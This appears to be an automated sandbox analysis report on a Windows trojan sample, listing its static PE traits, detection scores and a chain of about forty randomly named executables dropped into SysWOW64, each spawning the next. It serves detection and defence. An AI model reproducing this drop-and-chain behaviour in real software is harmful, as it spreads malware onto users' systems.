Source: C:\Windows\SysWOW64\Ccapffke.exe  Code function: String function: 00407EA4 appears 43 times
Source: C:\Windows\SysWOW64\Qgcpihjl.exe  Code function: String function: 00407EA4 appears 43 times
Source: C:\Windows\SysWOW64\Onkcje32.exe  Code function: String function: 00407EA4 appears 43 times
Source: C:\Windows\SysWOW64\Bmlhnnne.exe  Code function: String function: 00407EA4 appears 43 times
Source: C:\Windows\SysWOW64\Oeanchcn.exe  Code function: String function: 00407EA4 appears 43 times
Source: C:\Windows\SysWOW64\Olijjb32.exe  Code function: String function: 00407EA4 appears 43 times
Source: C:\Windows\SysWOW64\Bnpnbp32.exe  Code function: String function: 00407EA4 appears 43 times
Source: C:\Windows\SysWOW64\Pqeoao32.exe  Code function: String function: 00407EA4 appears 43 times
Source: C:\Windows\SysWOW64\Cfnpmb32.exe  Code function: String function: 00407EA4 appears 43 times
Source: C:\Windows\SysWOW64\Ppllkpoo.exe  Code function: String function: 00407EA4 appears 43 times
Source: C:\Windows\SysWOW64\Oglabl32.exe  Code function: String function: 00407EA4 appears 43 times
Source: C:\Windows\SysWOW64\Opbieagi.exe  Code function: String function: 00407EA4 appears 43 times
Source: C:\Windows\SysWOW64\Ojacofgb.exe  Code function: String function: 00407EA4 appears 43 times
Source: C:\Windows\SysWOW64\Cnjaioih.exe  Code function: String function: 00407EA4 appears 43 times
Source: C:\Windows\SysWOW64\Bqjacldl.exe  Code function: String function: 00407EA4 appears 43 times
Source: C:\Windows\SysWOW64\Bgamkfnl.exe  Code function: String function: 00407EA4 appears 43 times
Source: C:\Windows\SysWOW64\Nejhbi32.exe  Code function: String function: 00407EA4 appears 43 times
Source: C:\Windows\SysWOW64\Baagdk32.exe  Code function: String function: 00407EA4 appears 43 times
Source: C:\Windows\SysWOW64\Ceampi32.exe  Code function: String function: 00407EA4 appears 43 times
Source: Ojacofgb.exe.9.dr  Static PE information: Number of sections : 16 > 10
Source: Onkcje32.exe.7.dr  Static PE information: Number of sections : 16 > 10
Source: Dmfdkj32.exe.28.dr  Static PE information: Number of sections : 16 > 10
Source: Bgamkfnl.exe.17.dr  Static PE information: Number of sections : 16 > 10
Source: Camgpi32.exe.27.dr  Static PE information: Number of sections : 16 > 10
Source: Nejhbi32.exe.0.dr  Static PE information: Number of sections : 16 > 10
Source: Odekfoij.exe.8.dr  Static PE information: Number of sections : 16 > 10
Source: Cfnpmb32.exe.23.dr  Static PE information: Number of sections : 16 > 10
Source: Dnhmjm32.exe.29.dr  Static PE information: Number of sections : 16 > 10
Source: Edgbhcim.exe.31.dr  Static PE information: Number of sections : 16 > 10
Source: Cnjaioih.exe.26.dr  Static PE information: Number of sections : 16 > 10
Source: h879iieoae.exe  Static PE information: Number of sections : 16 > 10
Source: Bqjacldl.exe.18.dr  Static PE information: Number of sections : 16 > 10
Source: Bnpnbp32.exe.20.dr  Static PE information: Number of sections : 16 > 10
Source: Pqeoao32.exe.13.dr  Static PE information: Number of sections : 16 > 10
Source: Ogjdllpi.exe.1.dr  Static PE information: Number of sections : 16 > 10
Source: Ceampi32.exe.25.dr  Static PE information: Number of sections : 16 > 10
Source: Qgcpihjl.exe.14.dr  Static PE information: Number of sections : 16 > 10
Source: Bnnampcf.exe.19.dr  Static PE information: Number of sections : 16 > 10
Source: Baagdk32.exe.22.dr  Static PE information: Number of sections : 16 > 10
Source: Fhedeo32.exe.36.dr  Static PE information: Number of sections : 16 > 10
Source: Olijjb32.exe.4.dr  Static PE information: Number of sections : 16 > 10
Source: Bgibkegc.exe.21.dr  Static PE information: Number of sections : 16 > 10
Source: Fkogfkdj.exe.35.dr  Static PE information: Number of sections : 16 > 10
Source: Foaigifk.exe.38.dr  Static PE information: Number of sections : 16 > 10
Source: Oceoll32.exe.6.dr  Static PE information: Number of sections : 16 > 10
Source: Efgkjnfn.exe.33.dr  Static PE information: Number of sections : 16 > 10
Source: Ppllkpoo.exe.10.dr  Static PE information: Number of sections : 16 > 10
Source: Opbieagi.exe.2.dr  Static PE information: Number of sections : 16 > 10
Source: Plbmqa32.exe.11.dr  Static PE information: Number of sections : 16 > 10
Source: Eoappk32.exe.34.dr  Static PE information: Number of sections : 16 > 10
Source: Oeanchcn.exe.5.dr  Static PE information: Number of sections : 16 > 10
Source: Ggmnlk32.exe.39.dr  Static PE information: Number of sections : 16 > 10
Source: Emogai32.exe.32.dr  Static PE information: Number of sections : 16 > 10
Source: Oglabl32.exe.3.dr  Static PE information: Number of sections : 16 > 10
Source: Dfcboo32.exe.30.dr  Static PE information: Number of sections : 16 > 10
Source: Ccapffke.exe.24.dr  Static PE information: Number of sections : 16 > 10
Source: Feidnc32.exe.37.dr  Static PE information: Number of sections : 16 > 10
Source: Ajkolbad.exe.15.dr  Static PE information: Number of sections : 16 > 10
Source: Bmlhnnne.exe.16.dr  Static PE information: Number of sections : 16 > 10
Source: Plgflqpn.exe.12.dr  Static PE information: Number of sections : 16 > 10
Source: h879iieoae.exe  Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine  Classification label: mal100.troj.evad.winEXE@80/81@0/0
Source: C:\Users\user\Desktop\h879iieoae.exe  Code function: 0_2_004017AC CoInitialize, CLSIDFromString, VirtualAlloc, CoCreateInstance
Source: C:\Users\user\Desktop\h879iieoae.exe  Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: h879iieoae.exe  ReversingLabs: Detection: 81%
Source: h879iieoae.exe  Virustotal: Detection: 81%
Source: C:\Users\user\Desktop\h879iieoae.exe  File read: C:\Users\user\Desktop\h879iieoae.exe
Source: unknown  Process created: C:\Users\user\Desktop\h879iieoae.exe "C:\Users\user\Desktop\h879iieoae.exe"
Source: C:\Users\user\Desktop\h879iieoae.exe  Process created: C:\Windows\SysWOW64\Nejhbi32.exe C:\Windows\system32\Nejhbi32.exe
Source: C:\Windows\SysWOW64\Nejhbi32.exe  Process created: C:\Windows\SysWOW64\Ogjdllpi.exe C:\Windows\system32\Ogjdllpi.exe
Source: C:\Windows\SysWOW64\Ogjdllpi.exe  Process created: C:\Windows\SysWOW64\Opbieagi.exe C:\Windows\system32\Opbieagi.exe
Source: C:\Windows\SysWOW64\Opbieagi.exe  Process created: C:\Windows\SysWOW64\Oglabl32.exe C:\Windows\system32\Oglabl32.exe
Source: C:\Windows\SysWOW64\Oglabl32.exe  Process created: C:\Windows\SysWOW64\Olijjb32.exe C:\Windows\system32\Olijjb32.exe
Source: C:\Windows\SysWOW64\Olijjb32.exe  Process created: C:\Windows\SysWOW64\Oeanchcn.exe C:\Windows\system32\Oeanchcn.exe
Source: C:\Windows\SysWOW64\Oeanchcn.exe  Process created: C:\Windows\SysWOW64\Oceoll32.exe C:\Windows\system32\Oceoll32.exe
Source: C:\Windows\SysWOW64\Oceoll32.exe  Process created: C:\Windows\SysWOW64\Onkcje32.exe C:\Windows\system32\Onkcje32.exe
Source: C:\Windows\SysWOW64\Onkcje32.exe  Process created: C:\Windows\SysWOW64\Odekfoij.exe C:\Windows\system32\Odekfoij.exe
Source: C:\Windows\SysWOW64\Odekfoij.exe  Process created: C:\Windows\SysWOW64\Ojacofgb.exe C:\Windows\system32\Ojacofgb.exe
Source: C:\Windows\SysWOW64\Ojacofgb.exe  Process created: C:\Windows\SysWOW64\Ppllkpoo.exe C:\Windows\system32\Ppllkpoo.exe
Source: C:\Windows\SysWOW64\Ppllkpoo.exe  Process created: C:\Windows\SysWOW64\Plbmqa32.exe C:\Windows\system32\Plbmqa32.exe
Source: C:\Windows\SysWOW64\Plbmqa32.exe  Process created: C:\Windows\SysWOW64\Plgflqpn.exe C:\Windows\system32\Plgflqpn.exe
Source: C:\Windows\SysWOW64\Plgflqpn.exe  Process created: C:\Windows\SysWOW64\Pqeoao32.exe C:\Windows\system32\Pqeoao32.exe
Source: C:\Windows\SysWOW64\Pqeoao32.exe  Process created: C:\Windows\SysWOW64\Qgcpihjl.exe C:\Windows\system32\Qgcpihjl.exe
Source: C:\Windows\SysWOW64\Qgcpihjl.exe  Process created: C:\Windows\SysWOW64\Ajkolbad.exe C:\Windows\system32\Ajkolbad.exe
Source: C:\Windows\SysWOW64\Ajkolbad.exe  Process created: C:\Windows\SysWOW64\Bmlhnnne.exe C:\Windows\system32\Bmlhnnne.exe
Source: C:\Windows\SysWOW64\Bmlhnnne.exe  Process created: C:\Windows\SysWOW64\Bgamkfnl.exe C:\Windows\system32\Bgamkfnl.exe
Source: C:\Windows\SysWOW64\Bgamkfnl.exe  Process created: C:\Windows\SysWOW64\Bqjacldl.exe C:\Windows\system32\Bqjacldl.exe
Source: C:\Windows\SysWOW64\Bqjacldl.exe  Process created: C:\Windows\SysWOW64\Bnnampcf.exe C:\Windows\system32\Bnnampcf.exe
Source: C:\Windows\SysWOW64\Bnnampcf.exe  Process created: C:\Windows\SysWOW64\Bnpnbp32.exe C:\Windows\system32\Bnpnbp32.exe
Source: C:\Windows\SysWOW64\Bnpnbp32.exe  Process created: C:\Windows\SysWOW64\Bgibkegc.exe C:\Windows\system32\Bgibkegc.exe
Source: C:\Windows\SysWOW64\Bgibkegc.exe  Process created: C:\Windows\SysWOW64\Baagdk32.exe C:\Windows\system32\Baagdk32.exe
Source: C:\Windows\SysWOW64\Baagdk32.exe  Process created: C:\Windows\SysWOW64\Cfnpmb32.exe C:\Windows\system32\Cfnpmb32.exe
Source: C:\Windows\SysWOW64\Cfnpmb32.exe  Process created: C:\Windows\SysWOW64\Ccapffke.exe C:\Windows\system32\Ccapffke.exe
Source: C:\Windows\SysWOW64\Ccapffke.exe  Process created: C:\Windows\SysWOW64\Ceampi32.exe C:\Windows\system32\Ceampi32.exe
Source: C:\Windows\SysWOW64\Ceampi32.exe  Process created: C:\Windows\SysWOW64\Cnjaioih.exe C:\Windows\system32\Cnjaioih.exe
Source: C:\Windows\SysWOW64\Cnjaioih.exe  Process created: C:\Windows\SysWOW64\Camgpi32.exe C:\Windows\system32\Camgpi32.exe
Source: C:\Windows\SysWOW64\Camgpi32.exe  Process created: C:\Windows\SysWOW64\Dmfdkj32.exe C:\Windows\system32\Dmfdkj32.exe
Source: C:\Windows\SysWOW64\Dmfdkj32.exe  Process created: C:\Windows\SysWOW64\Dnhmjm32.exe C:\Windows\system32\Dnhmjm32.exe
Source: C:\Windows\SysWOW64\Dnhmjm32.exe  Process created: C:\Windows\SysWOW64\Dfcboo32.exe C:\Windows\system32\Dfcboo32.exe
Source: C:\Windows\SysWOW64\Dfcboo32.exe  Process created: C:\Windows\SysWOW64\Edgbhcim.exe C:\Windows\system32\Edgbhcim.exe
Source: C:\Windows\SysWOW64\Edgbhcim.exe  Process created: C:\Windows\SysWOW64\Emogai32.exe C:\Windows\system32\Emogai32.exe
Source: C:\Windows\SysWOW64\Emogai32.exe  Process created: C:\Windows\SysWOW64\Efgkjnfn.exe C:\Windows\system32\Efgkjnfn.exe
Source: C:\Windows\SysWOW64\Efgkjnfn.exe  Process created: C:\Windows\SysWOW64\Eoappk32.exe C:\Windows\system32\Eoappk32.exe
Source: C:\Windows\SysWOW64\Eoappk32.exe  Process created: C:\Windows\SysWOW64\Fkogfkdj.exe C:\Windows\system32\Fkogfkdj.exe
Source: C:\Windows\SysWOW64\Fkogfkdj.exe  Process created: C:\Windows\SysWOW64\Fhedeo32.exe C:\Windows\system32\Fhedeo32.exe
Source: C:\Windows\SysWOW64\Fhedeo32.exe  Process created: C:\Windows\SysWOW64\Feidnc32.exe C:\Windows\system32\Feidnc32.exe
Source: C:\Windows\SysWOW64\Feidnc32.exe  Process created: C:\Windows\SysWOW64\Foaigifk.exe C:\Windows\system32\Foaigifk.exe
Source: C:\Windows\SysWOW64\Foaigifk.exe  Process created: unknown unknown
Source: C:\Users\user\Desktop\h879iieoae.exe  Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\h879iieoae.exe  Section loaded: wininet.dll
Source: C:\Users\user\Desktop\h879iieoae.exe  Section loaded: crtdll.dll
Source: C:\Users\user\Desktop\h879iieoae.exe  Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\Nejhbi32.exe  Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\Nejhbi32.exe  Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\Nejhbi32.exe  Section loaded: crtdll.dll
Source: C:\Windows\SysWOW64\Nejhbi32.exe  Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\Ogjdllpi.exe  Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\Ogjdllpi.exe  Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\Ogjdllpi.exe  Section loaded: crtdll.dll
Source: C:\Windows\SysWOW64\Ogjdllpi.exe  Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\Opbieagi.exe  Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\Opbieagi.exe  Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\Opbieagi.exe  Section loaded: crtdll.dll
Source: C:\Windows\SysWOW64\Opbieagi.exe  Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\Oglabl32.exe  Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\Oglabl32.exe  Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\Oglabl32.exe  Section loaded: crtdll.dll
Source: C:\Windows\SysWOW64\Oglabl32.exe  Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\Olijjb32.exe  Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\Olijjb32.exe  Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\Olijjb32.exe  Section loaded: crtdll.dll
Source: C:\Windows\SysWOW64\Olijjb32.exe  Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\Oeanchcn.exe  Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\Oeanchcn.exe  Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\Oeanchcn.exe  Section loaded: crtdll.dll
Source: C:\Windows\SysWOW64\Oeanchcn.exe  Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\Oceoll32.exe  Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\Oceoll32.exe  Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\Oceoll32.exe  Section loaded: crtdll.dll
Source: C:\Windows\SysWOW64\Oceoll32.exe  Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\Onkcje32.exe  Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\Onkcje32.exe  Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\Onkcje32.exe  Section loaded: crtdll.dll
Source: C:\Windows\SysWOW64\Onkcje32.exe  Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\Odekfoij.exe  Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\Odekfoij.exe  Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\Odekfoij.exe  Section loaded: crtdll.dll
Source: C:\Windows\SysWOW64\Odekfoij.exe  Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\Ojacofgb.exe  Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\Ojacofgb.exe  Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\Ojacofgb.exe  Section loaded: crtdll.dll
Source: C:\Windows\SysWOW64\Ojacofgb.exe  Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\Ppllkpoo.exe  Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\Ppllkpoo.exe  Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\Ppllkpoo.exe  Section loaded: crtdll.dll
Source: C:\Windows\SysWOW64\Ppllkpoo.exe  Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\Plbmqa32.exe  Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\Plbmqa32.exe  Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\Plbmqa32.exe  Section loaded: crtdll.dll
Source: C:\Windows\SysWOW64\Plbmqa32.exe  Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\Plgflqpn.exe  Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\Plgflqpn.exe  Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\Plgflqpn.exe  Section loaded: crtdll.dll
Source: C:\Windows\SysWOW64\Plgflqpn.exe  Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\Pqeoao32.exe  Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\Pqeoao32.exe  Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\Pqeoao32.exe  Section loaded: crtdll.dll
Source: C:\Windows\SysWOW64\Pqeoao32.exe  Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\Qgcpihjl.exe  Section loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\Qgcpihjl.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Qgcpihjl.exeSection loaded: crtdll.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Qgcpihjl.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Ajkolbad.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Ajkolbad.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Ajkolbad.exeSection loaded: crtdll.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Ajkolbad.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Bmlhnnne.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Bmlhnnne.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Bmlhnnne.exeSection loaded: crtdll.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Bmlhnnne.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Bgamkfnl.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Bgamkfnl.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Bgamkfnl.exeSection loaded: crtdll.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Bgamkfnl.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Bqjacldl.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Bqjacldl.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Bqjacldl.exeSection loaded: crtdll.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Bqjacldl.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Bnnampcf.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Bnnampcf.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Bnnampcf.exeSection loaded: crtdll.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Bnnampcf.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Bnpnbp32.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Bnpnbp32.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Bnpnbp32.exeSection loaded: crtdll.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Bnpnbp32.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Bgibkegc.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Bgibkegc.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Bgibkegc.exeSection loaded: crtdll.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Bgibkegc.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Baagdk32.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Baagdk32.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Baagdk32.exeSection loaded: crtdll.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Baagdk32.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Cfnpmb32.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Cfnpmb32.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Cfnpmb32.exeSection loaded: crtdll.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Cfnpmb32.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Ccapffke.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Ccapffke.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Ccapffke.exeSection loaded: crtdll.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Ccapffke.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\Ceampi32.exeSection loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\Ceampi32.exeSection loaded: wininet.dll
                      Source: C:\Windows\SysWOW64\Ceampi32.exeSection loaded: crtdll.dll
                      Source: C:\Windows\SysWOW64\Ceampi32.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\SysWOW64\Cnjaioih.exeSection loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\Cnjaioih.exeSection loaded: wininet.dll
                      Source: C:\Windows\SysWOW64\Cnjaioih.exeSection loaded: crtdll.dll
                      Source: C:\Windows\SysWOW64\Cnjaioih.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\SysWOW64\Camgpi32.exeSection loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\Camgpi32.exeSection loaded: wininet.dll
                      Source: C:\Windows\SysWOW64\Camgpi32.exeSection loaded: crtdll.dll
                      Source: C:\Windows\SysWOW64\Camgpi32.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\SysWOW64\Dmfdkj32.exeSection loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\Dmfdkj32.exeSection loaded: wininet.dll
                      Source: C:\Windows\SysWOW64\Dmfdkj32.exeSection loaded: crtdll.dll
                      Source: C:\Windows\SysWOW64\Dmfdkj32.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\SysWOW64\Dnhmjm32.exeSection loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\Dnhmjm32.exeSection loaded: wininet.dll
                      Source: C:\Windows\SysWOW64\Dnhmjm32.exeSection loaded: crtdll.dll
                      Source: C:\Windows\SysWOW64\Dnhmjm32.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\SysWOW64\Dfcboo32.exeSection loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\Dfcboo32.exeSection loaded: wininet.dll
                      Source: C:\Windows\SysWOW64\Dfcboo32.exeSection loaded: crtdll.dll
                      Source: C:\Windows\SysWOW64\Dfcboo32.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\SysWOW64\Edgbhcim.exeSection loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\Edgbhcim.exeSection loaded: wininet.dll
                      Source: C:\Windows\SysWOW64\Edgbhcim.exeSection loaded: crtdll.dll
                      Source: C:\Windows\SysWOW64\Edgbhcim.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\SysWOW64\Emogai32.exeSection loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\Emogai32.exeSection loaded: wininet.dll
                      Source: C:\Windows\SysWOW64\Emogai32.exeSection loaded: crtdll.dll
                      Source: C:\Windows\SysWOW64\Emogai32.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\SysWOW64\Efgkjnfn.exeSection loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\Efgkjnfn.exeSection loaded: wininet.dll
                      Source: C:\Windows\SysWOW64\Efgkjnfn.exeSection loaded: crtdll.dll
                      Source: C:\Windows\SysWOW64\Efgkjnfn.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\SysWOW64\Eoappk32.exeSection loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\Eoappk32.exeSection loaded: wininet.dll
                      Source: C:\Windows\SysWOW64\Eoappk32.exeSection loaded: crtdll.dll
                      Source: C:\Windows\SysWOW64\Eoappk32.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\SysWOW64\Fkogfkdj.exeSection loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\Fkogfkdj.exeSection loaded: wininet.dll
                      Source: C:\Windows\SysWOW64\Fkogfkdj.exeSection loaded: crtdll.dll
                      Source: C:\Windows\SysWOW64\Fkogfkdj.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\SysWOW64\Fhedeo32.exeSection loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\Fhedeo32.exeSection loaded: wininet.dll
                      Source: C:\Windows\SysWOW64\Fhedeo32.exeSection loaded: crtdll.dll
                      Source: C:\Windows\SysWOW64\Fhedeo32.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\SysWOW64\Feidnc32.exeSection loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\Feidnc32.exeSection loaded: wininet.dll
                      Source: C:\Windows\SysWOW64\Feidnc32.exeSection loaded: crtdll.dll
                      Source: C:\Windows\SysWOW64\Feidnc32.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\SysWOW64\Foaigifk.exeSection loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\Foaigifk.exeSection loaded: wininet.dll
                      Source: C:\Windows\SysWOW64\Foaigifk.exeSection loaded: crtdll.dll
                      Source: C:\Windows\SysWOW64\Foaigifk.exeSection loaded: ntmarta.dll
                      Source: C:\Users\user\Desktop\h879iieoae.exe | Code function: 0_2_00402E06 GetVersion,LoadLibraryA,GetProcAddress,IsBadReadPtr,GlobalMemoryStatus,GetEnvironmentStringsW,CloseHandle,GetModuleHandleA,VirtualQuery,IsBadWritePtr,0_2_00402E06
                      Source: initial sample | Static PE information: section where entry point is pointing to: .embm
                      Source: h879iieoae.exe | Static PE information: section name: .embm
                      Source: Nejhbi32.exe.0.dr | Static PE information: section name: .embm
                      Source: Ogjdllpi.exe.1.dr | Static PE information: section name: .embm
                      Source: Opbieagi.exe.2.dr | Static PE information: section name: .embm
                      Source: Oglabl32.exe.3.dr | Static PE information: section name: .embm
                      Source: Olijjb32.exe.4.dr | Static PE information: section name: .embm
                      Source: Oeanchcn.exe.5.dr | Static PE information: section name: .embm
                      Source: Oceoll32.exe.6.dr | Static PE information: section name: .embm
                      Source: Onkcje32.exe.7.dr | Static PE information: section name: .embm
                      Source: Odekfoij.exe.8.dr | Static PE information: section name: .embm
                      Source: Ojacofgb.exe.9.dr | Static PE information: section name: .embm
                      Source: Ppllkpoo.exe.10.dr | Static PE information: section name: .embm
                      Source: Plbmqa32.exe.11.dr | Static PE information: section name: .embm
                      Source: Plgflqpn.exe.12.dr | Static PE information: section name: .embm
                      Source: Pqeoao32.exe.13.dr | Static PE information: section name: .embm
                      Source: Qgcpihjl.exe.14.dr | Static PE information: section name: .embm
                      Source: Ajkolbad.exe.15.dr | Static PE information: section name: .embm
                      Source: Bmlhnnne.exe.16.dr | Static PE information: section name: .embm
                      Source: Bgamkfnl.exe.17.dr | Static PE information: section name: .embm
                      Source: Bqjacldl.exe.18.dr | Static PE information: section name: .embm
                      Source: Bnnampcf.exe.19.dr | Static PE information: section name: .embm
                      Source: Bnpnbp32.exe.20.dr | Static PE information: section name: .embm
                      Source: Bgibkegc.exe.21.dr | Static PE information: section name: .embm
                      Source: Baagdk32.exe.22.dr | Static PE information: section name: .embm
                      Source: Cfnpmb32.exe.23.dr | Static PE information: section name: .embm
                      Source: Ccapffke.exe.24.dr | Static PE information: section name: .embm
                      Source: Ceampi32.exe.25.dr | Static PE information: section name: .embm
                      Source: Cnjaioih.exe.26.dr | Static PE information: section name: .embm
                      Source: Camgpi32.exe.27.dr | Static PE information: section name: .embm
                      Source: Dmfdkj32.exe.28.dr | Static PE information: section name: .embm
                      Source: Dnhmjm32.exe.29.dr | Static PE information: section name: .embm
                      Source: Dfcboo32.exe.30.dr | Static PE information: section name: .embm
                      Source: Edgbhcim.exe.31.dr | Static PE information: section name: .embm
                      Source: Emogai32.exe.32.dr | Static PE information: section name: .embm
                      Source: Efgkjnfn.exe.33.dr | Static PE information: section name: .embm
                      Source: Eoappk32.exe.34.dr | Static PE information: section name: .embm
                      Source: Fkogfkdj.exe.35.dr | Static PE information: section name: .embm
                      Source: Fhedeo32.exe.36.dr | Static PE information: section name: .embm
                      Source: Feidnc32.exe.37.dr | Static PE information: section name: .embm
                      Source: Foaigifk.exe.38.dr | Static PE information: section name: .embm
                      Source: Ggmnlk32.exe.39.dr | Static PE information: section name: .embm
                      Source: h879iieoae.exe | Static PE information: section name: .text entropy: 7.190507132248476
                      Source: Nejhbi32.exe.0.dr | Static PE information: section name: .text entropy: 7.183772002837302
                      Source: Ogjdllpi.exe.1.dr | Static PE information: section name: .text entropy: 7.147443164942795
                      Source: Opbieagi.exe.2.dr | Static PE information: section name: .text entropy: 7.178518855910967
                      Source: Oglabl32.exe.3.dr | Static PE information: section name: .text entropy: 7.185742599580611
                      Source: Olijjb32.exe.4.dr | Static PE information: section name: .text entropy: 7.110531950014891
                      Source: Oeanchcn.exe.5.dr | Static PE information: section name: .text entropy: 7.185357437360054
                      Source: Oceoll32.exe.6.dr | Static PE information: section name: .text entropy: 7.168480651808014
                      Source: Onkcje32.exe.7.dr | Static PE information: section name: .text entropy: 7.130939198292088
                      Source: Odekfoij.exe.8.dr | Static PE information: section name: .text entropy: 7.174220243060091
